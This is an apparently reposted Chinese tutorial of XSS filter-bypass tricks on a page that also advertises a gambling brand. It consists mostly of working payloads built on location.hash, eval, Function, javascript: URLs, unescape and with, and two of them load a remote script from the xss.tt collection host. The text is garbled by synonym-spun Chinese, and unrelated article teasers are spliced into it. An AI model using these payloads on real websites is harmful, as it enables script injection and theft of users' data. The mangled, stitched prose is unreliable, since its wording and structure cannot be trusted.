XSS相干一些小我Tips | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

XSS相干一些小我Tips

申博_安全防护 申博 148次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

媒介

近日在看些xss相干的学问,在乌云学问库上,有篇XSS应战第一期Writeup内里姿态许多,才能缺乏,有些没法复现,就把本身以为好玩的写下来。

location

Location工具关于我们组织一些另类的xss payload有很大的资助,比方P牛这篇文章引见的运用编码运用location来变形我们的XSS Payload

XSS相干一些小我Tips

Location

在引见Location的属性前,我们先来了解下slice()要领。

slice() 要领可从已有的字符串中返回选定的元素。

XSS相干一些小我Tips

location.hash

查阅文档。

XSS相干一些小我Tips

我们存眷的重点是#的作用,location工具的hash属性用于设置或获得 URL 中的锚局部。

比方我们如今的网址为http://localhost/1.html#s9mf,我们在控制台输入location.hash,则会返回我们设定的

XSS相干一些小我Tips

运用这个特征,在组织xss代码时,能够把一局部payload,安排在测试语句的尾部。

例子:

<body/onload=eval(location.hash.slice(1))>#alert(1)

这里用eval实行经由过程location.hash猎取过去的alert(1)代码,slice要领在这里的作用是截取下标为1今后的字符串元素(包孕1)。若是你照样不太明白,那末我们用document.write输出到页面。

XSS相干一些小我Tips

可见,slice要领在这里返回的字符串为alert(1)substr要领在这里也能够替代slice运用。

<body/onload=setTimeout(location.hash.substr(1))()>#alert(1)

这里运用的setTimeout,也能够运用constructor属性来实行代码,不外要记着加个()

CVE-2018-18500:应用Firefox的堆破绽举行进击

概要 本文是关于CVE-2018-18500的一个Mozilla Firefox安全漏洞,由SophosLabs于2018年11月发布并向Mozilla Foundation报告。 此安全漏洞涉及Gecko(Firefox的浏览器引擎)中的软件错误,其中包含负责解析网页的代码。通过对网页进行恶意

Set.constructor(location.hash.substr(1))()

XSS相干一些小我Tips

也能够运用execScript,不外execScript是IE浏览器独占,以是只能在IE弹,相比较下eval则是一切浏览器都支撑。

<body/onload=execScript(location.hash.substr(1))>#alert(1)

XSS相干一些小我Tips

运用Function匿名函数来实行尾部的代码。

<body/onload=Function(location.hash.slice(1))()>#alert(/xss/)

XSS相干一些小我Tips

运用伪协定

<body/onload=eval(location.hash.slice(1))>#javascript:alert(1)

运用解释,援用伪协定后最先变得风趣。

<svg/onload=location='javascript:/*'%2blocation.hash> #*/alert(1)

更进一步。

<svg/onload=location="javascript:"%2binnerHTML%2blocation.hash>"  #"-alert(1)

XSS相干一些小我Tips

unescape()

unescape()函数用于对已运用escape()函数编码的字符串举行解码,并返回解码后的字符串。

我们引入外部url时,若是阻拦//,我们能够先url编码,再解码。

XSS相干一些小我Tips

比方:

<svg/onload=appendChild(createElement('script')).src=unescape('http%3A%2F%2Fxss.tt%2F1te')>

XSS相干一些小我Tips

with

with语句能够方便地用来援用某个特定工具中已有的属性。运用with能够完成经由过程节点称号的工具挪用。

若是.被阻拦,我们能够实验with

<svg/onload=with(location)with(hash)eval(alert(1))>

XSS相干一些小我Tips

基于DOM的要领创建和插进去节点把外部JS文件注入到网页中,也能够运用with。

<svg/onload="[1].find(function(){with(`docom'|e|'nt`);;body.appendChild(createElement('script')).src='http://xss.tt/XA'})">

C++逆向学习(一) string

CTF比赛中C++的题越来越多,题目中经常出现string,vector等,而实际上手时发现常常迷失在”库函数”中,比如跟进了空间配置器相关函数 最近研究一下关于这些的底层机制与逆向,应该会写成一个系列 string 内存布局 visual studio的调试实


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明XSS相干一些小我Tips
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址